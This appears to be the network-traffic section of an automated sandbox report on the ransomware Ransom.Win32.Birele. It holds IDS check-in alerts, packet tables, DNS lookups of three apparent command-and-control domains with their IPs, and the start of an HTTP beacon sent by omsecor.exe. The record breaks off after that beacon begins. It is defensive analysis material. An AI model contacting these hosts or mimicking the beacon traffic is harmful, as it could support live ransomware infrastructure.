                                                                                                                                                                                                2024-11-01T16:05:40.336101+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.450008193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:05:41.083381+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.45002315.197.204.5680TCP
                                                                                                                                                                                                2024-11-01T16:05:42.038840+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.45002452.34.198.22980TCP
                                                                                                                                                                                                2024-11-01T16:05:50.745370+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.450025193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:05:59.370566+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.450026193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:06:00.210738+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.45002715.197.204.5680TCP
                                                                                                                                                                                                2024-11-01T16:06:01.423576+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.45002852.34.198.22980TCP
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 1, 2024 16:03:55.533588886 CET4973080192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:03:55.538518906 CET8049730193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:03:55.538589954 CET4973080192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:03:55.547741890 CET4973080192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:03:55.552567959 CET8049730193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:03:56.410881996 CET8049730193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:03:56.410998106 CET4973080192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:03:56.411129951 CET4973080192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:03:56.415869951 CET8049730193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:03:56.650118113 CET4973180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:03:56.655059099 CET8049731193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:03:56.655147076 CET4973180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:03:56.655287981 CET4973180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:03:56.660090923 CET8049731193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:05.127090931 CET8049731193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:05.127285004 CET4973180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:05.127429008 CET4973180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:05.132194996 CET8049731193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:05.245050907 CET4973280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:05.249881983 CET804973215.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:05.249970913 CET4973280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:05.250096083 CET4973280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:05.255228996 CET804973215.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:05.884797096 CET804973215.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:05.885040045 CET4973280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:06.345958948 CET4973380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:06.350850105 CET804973352.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:06.350958109 CET4973380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:06.351166964 CET4973380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:06.356406927 CET804973352.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:07.185451984 CET804973352.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:07.185777903 CET4973380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:07.201874018 CET4973380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:07.207284927 CET804973352.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:07.207355022 CET4973380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:07.433876991 CET4973480192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:07.435616016 CET4973280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:07.438863993 CET8049734193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:07.438935041 CET4973480192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:07.439101934 CET4973480192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:07.443870068 CET8049734193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:15.921226025 CET8049734193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:15.921297073 CET4973480192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:15.921411991 CET4973480192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:15.926791906 CET8049734193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:16.027992010 CET4974180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:16.033951998 CET8049741193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:16.034022093 CET4974180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:16.034172058 CET4974180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:16.039417982 CET8049741193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:24.544390917 CET8049741193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:24.544476032 CET4974180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:24.544655085 CET4974180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:24.549401045 CET8049741193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:24.655210972 CET4974280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:24.660115004 CET804974215.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:24.660202980 CET4974280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:24.661830902 CET4974280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:24.666613102 CET804974215.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:25.293509960 CET804974215.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:25.297259092 CET4974280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:25.403994083 CET4974380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:25.409152985 CET804974352.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:25.409301043 CET4974380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:25.409394979 CET4974380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:25.414200068 CET804974352.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:26.234617949 CET804974352.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:26.234709024 CET4974380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:26.235527992 CET4974380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:26.240858078 CET804974352.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:26.240911007 CET4974380192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:26.354468107 CET4974480192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:26.360733986 CET8049744193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:26.360851049 CET4974480192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:26.361087084 CET4974480192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:26.367573023 CET8049744193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:34.852221012 CET8049744193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:34.852421999 CET4974480192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:34.852555990 CET4974480192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:34.857309103 CET8049744193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:34.963768959 CET4974580192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:34.968682051 CET8049745193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:34.968801022 CET4974580192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:34.968975067 CET4974580192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:34.978610992 CET8049745193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:43.451186895 CET8049745193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:43.451297998 CET4974580192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:43.454175949 CET4974580192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:43.459017038 CET8049745193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:43.785203934 CET4974280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:43.790561914 CET804974215.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:43.943324089 CET804974215.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:43.943413973 CET4974280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:44.057486057 CET4974780192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:44.062310934 CET804974752.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:44.062441111 CET4974780192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:44.062597036 CET4974780192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:44.067379951 CET804974752.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:44.887509108 CET804974752.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:44.887600899 CET4974780192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:44.888129950 CET4974780192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:44.893270016 CET804974752.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:44.893336058 CET4974780192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:04:45.103720903 CET4974280192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:04:45.123301983 CET4974880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:45.128223896 CET8049748193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:45.128294945 CET4974880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:45.128473997 CET4974880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:45.133254051 CET8049748193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:53.613965034 CET8049748193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:53.615772963 CET4974880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:53.615869045 CET4974880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:53.620743990 CET8049748193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:53.729649067 CET4979880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:53.734646082 CET8049798193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:53.734733105 CET4979880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:53.735132933 CET4979880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:04:53.739912987 CET8049798193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:02.221141100 CET8049798193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:02.221230984 CET4979880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:02.221318007 CET4979880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:02.226123095 CET8049798193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:02.334348917 CET4983880192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:02.339236975 CET804983815.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:02.339303970 CET4983880192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:02.340269089 CET4983880192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:02.345158100 CET804983815.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:03.027405024 CET804983815.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:03.027476072 CET4983880192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:03.137872934 CET4984480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:03.142764091 CET804984452.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:03.142870903 CET4984480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:03.143146038 CET4984480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:03.148029089 CET804984452.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:03.976630926 CET804984452.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:03.976731062 CET4984480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:03.980524063 CET4984480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:03.986705065 CET804984452.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:03.986763954 CET4984480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:04.198474884 CET4985180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:04.203375101 CET8049851193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:04.203471899 CET4985180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:04.203615904 CET4985180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:04.208555937 CET8049851193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:12.687202930 CET8049851193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:12.687294960 CET4985180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:12.687395096 CET4985180192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:12.692368984 CET8049851193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:12.792388916 CET4989980192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:12.797333956 CET8049899193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:12.797557116 CET4989980192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:12.797590971 CET4989980192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:12.802598000 CET8049899193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:21.282504082 CET8049899193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:21.282608986 CET4989980192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:21.282733917 CET4989980192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:21.287530899 CET8049899193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:21.386032104 CET4983880192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:21.386531115 CET4994580192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:21.391633987 CET804983815.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:21.391721010 CET4983880192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:21.392949104 CET804994515.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:21.393035889 CET4994580192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:21.393177986 CET4994580192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:21.398504019 CET804994515.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:22.052130938 CET804994515.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:22.052289009 CET4994580192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:22.167193890 CET4995180192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:22.172569036 CET804995152.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:22.172746897 CET4995180192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:22.173016071 CET4995180192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:22.178832054 CET804995152.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:23.012407064 CET804995152.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:23.012530088 CET4995180192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:23.013237953 CET4995180192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:23.018802881 CET804995152.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:23.018893003 CET4995180192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:23.229825020 CET4995880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:23.238070011 CET8049958193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:23.238224983 CET4995880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:23.238634109 CET4995880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:23.244151115 CET8049958193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:31.722382069 CET8049958193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:31.722522974 CET4995880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:31.722634077 CET4995880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:31.727435112 CET8049958193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:31.838958979 CET5000880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:31.845743895 CET8050008193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:31.845837116 CET5000880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:31.846018076 CET5000880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:31.851963043 CET8050008193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:40.335864067 CET8050008193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:40.336101055 CET5000880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:40.336170912 CET5000880192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:40.341495991 CET8050008193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:40.448610067 CET4994580192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:40.449044943 CET5002380192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:40.453923941 CET805002315.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:40.454004049 CET5002380192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:40.454207897 CET5002380192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:40.454869986 CET804994515.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:40.454924107 CET4994580192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:40.459256887 CET805002315.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:41.083230019 CET805002315.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:41.083380938 CET5002380192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:41.201288939 CET5002480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:41.212498903 CET805002452.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:41.212618113 CET5002480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:41.215163946 CET5002480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:41.224436045 CET805002452.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:42.038714886 CET805002452.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:42.038840055 CET5002480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:42.039679050 CET5002480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:42.044687986 CET805002452.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:42.044792891 CET5002480192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:05:42.261265993 CET5002580192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:42.266331911 CET8050025193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:42.266438961 CET5002580192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:42.266555071 CET5002580192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:42.271780968 CET8050025193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:50.745245934 CET8050025193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:50.745369911 CET5002580192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:50.745531082 CET5002580192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:50.750504971 CET8050025193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:50.855205059 CET5002680192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:50.861541033 CET8050026193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:50.861622095 CET5002680192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:50.861746073 CET5002680192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:50.869232893 CET8050026193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:59.370419979 CET8050026193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:59.370565891 CET5002680192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:59.370655060 CET5002680192.168.2.4193.166.255.171
                                                                                                                                                                                                Nov 1, 2024 16:05:59.402772903 CET8050026193.166.255.171192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:59.480148077 CET5002380192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:59.480525017 CET5002780192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:59.522804976 CET805002715.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:59.522862911 CET805002315.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:05:59.523039103 CET5002380192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:59.523369074 CET5002780192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:59.523369074 CET5002780192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:05:59.548515081 CET805002715.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:06:00.210562944 CET805002715.197.204.56192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:06:00.210737944 CET5002780192.168.2.415.197.204.56
                                                                                                                                                                                                Nov 1, 2024 16:06:00.323729038 CET5002880192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:06:00.351454020 CET805002852.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:06:00.351545095 CET5002880192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:06:00.351746082 CET5002880192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:06:00.391036987 CET805002852.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:06:01.423464060 CET805002852.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:06:01.423576117 CET5002880192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:06:01.424287081 CET5002880192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:06:01.425427914 CET805002852.34.198.229192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:06:01.425478935 CET5002880192.168.2.452.34.198.229
                                                                                                                                                                                                Nov 1, 2024 16:06:01.435884953 CET805002852.34.198.229192.168.2.4
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 1, 2024 16:03:55.460974932 CET6374053192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 1, 2024 16:03:55.493470907 CET53637401.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:05.232973099 CET6306253192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 1, 2024 16:04:05.242806911 CET53630621.1.1.1192.168.2.4
                                                                                                                                                                                                Nov 1, 2024 16:04:05.997051954 CET5664453192.168.2.41.1.1.1
                                                                                                                                                                                                Nov 1, 2024 16:04:06.344995022 CET53566441.1.1.1192.168.2.4
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 1, 2024 16:03:55.460974932 CET192.168.2.41.1.1.10x71f1Standard query (0)lousta.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 1, 2024 16:04:05.232973099 CET192.168.2.41.1.1.10x66caStandard query (0)mkkuei4kdsz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 1, 2024 16:04:05.997051954 CET192.168.2.41.1.1.10x7c95Standard query (0)ow5dirasuek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 1, 2024 16:03:55.493470907 CET1.1.1.1192.168.2.40x71f1No error (0)lousta.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 1, 2024 16:04:05.242806911 CET1.1.1.1192.168.2.40x66caNo error (0)mkkuei4kdsz.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 1, 2024 16:04:05.242806911 CET1.1.1.1192.168.2.40x66caNo error (0)mkkuei4kdsz.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 1, 2024 16:04:06.344995022 CET1.1.1.1192.168.2.40x7c95No error (0)ow5dirasuek.com52.34.198.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                • lousta.net
                                                                                                                                                                                                • mkkuei4kdsz.com
                                                                                                                                                                                                • ow5dirasuek.com
                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.449730193.166.255.171806792C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 1, 2024 16:03:55.547741890 CET185OUTGET /875/87.html HTTP/1.1
                                                                                                                                                                                                From: 133749470339604713
